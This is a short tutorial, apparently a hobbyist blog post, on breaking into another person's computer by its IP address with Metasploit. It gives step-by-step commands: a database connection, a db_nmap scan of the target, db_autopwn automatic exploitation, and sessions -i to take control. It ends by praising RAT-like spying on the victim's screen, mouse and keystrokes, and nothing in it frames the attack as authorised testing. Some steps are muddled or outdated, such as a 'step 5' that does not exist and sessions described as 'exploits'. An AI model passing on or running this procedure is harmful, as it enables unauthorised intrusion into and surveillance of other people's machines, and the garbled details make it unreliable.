How to hack a computer with an IP using MetaSploit @SketchTeck

Metasploit is a powerful tool that can be used to hack a computer with only it's IP address.


Lets begin

  • After installing both tools, open up the PostgrSQL admin GUI (start -> all programs -> PostgreSQL 9.0 -> pgAdmin III). Then right-click on your server (in the left hand box) and click connect. Remember to keep this window open the whole time. You will also need the pass you chose to use in step 5
  • Go to start -> all programs -> Metasploit Framework, and then open the Metasploit gui.
  • In the window enter: ' db_connect postgres: YourPassword@localhost:5432 ' . The first time you do this you will see lots of text flash buy. Don't wory, this is normal.
  • Type db_host to make sure you are connected correctly.
  • Now enter this: db_nmap 000.000.000.000 . Replace 000.000.000.000 with the IP of the computer you are trying to hack. You should have something like ' db_nmap 192.168.013.123 '
  • Now we get to the fun part where the automatic exploitation begins. Enter db_autopwn -t -p -e -s -b . This starts the exploitation and it may take some time so just relax and wait
  • After the exploitation is done, type sessions -l to see what the scanner found. If all went well, you should see a list of exploits.
  • Now you can use the exploits to hack the computer! If you will notice, all of the exploits are numbered, and they all have obvious names (i. e., reverseScreen_tcp). To use an exploit, enter this: ' sessions -i ExploitNumber ' . Note: ExploitNumber is the number attached to the particular exploit you want to use
The features of Metasploit are much like a rat. Once you get into someone's computer, you can see their screen, control their mouse, see what they type, etc.All the best 😎